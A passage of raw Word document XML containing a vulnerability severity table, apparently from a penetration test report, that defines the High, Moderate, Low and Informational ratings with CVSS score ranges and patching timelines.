                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>7.0-</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6775" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3440D760" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="113" w:right="399"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Exploitation is</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>more</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>difficult but could</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>cause</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>elevated</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>privileges</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-1"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>and potentially a loss of data or downtime. It is advised to form a plan of action and patch as soon as possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00142A90" w:rsidRPr="00FA1072" w14:paraId="1D8E4945" w14:textId="77777777" w:rsidTr="00485380">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1999" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="4D98D927" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="10"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="27"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7BCF868E" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="128"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1505" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6369EA2C" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="5"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71498C19" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="101"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>4.0-</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6775" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D908D6D" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="115" w:right="261"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Vulnerabilities</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>exist</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>but</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>are</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>not</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>exploitable</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>require</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>extra</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>steps</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-3"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>such as social engineering. It is advised to form a plan of action and patch after high-priority issues have been resolved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00142A90" w:rsidRPr="00FA1072" w14:paraId="475A4B22" w14:textId="77777777" w:rsidTr="00485380">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1999" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00AE50"/>
          </w:tcPr>
          <w:p w14:paraId="769D9828" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="16E32A4C" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="129"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1505" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23DA7184" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="5"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E418882" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="101"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>0.1-</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6775" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="031E9582" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="113" w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Vulnerabilities</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>are</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>non-exploitable</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>but</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>would</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>reduce</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>an</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>organization’s attack surface. It is advised to form a plan of action and patch during the next maintenance window.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00142A90" w:rsidRPr="00FA1072" w14:paraId="7F27DDE2" w14:textId="77777777" w:rsidTr="00485380">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1999" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="006EC0"/>
          </w:tcPr>
          <w:p w14:paraId="6E0125F4" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D19E0E0" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="130"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1505" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24D4C61F" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="5"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="11C15773" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="102"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6775" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4144957E" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="114" w:right="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>vulnerability</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-8"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>exists.</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="36"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Additional</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>information</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>is</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-9"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
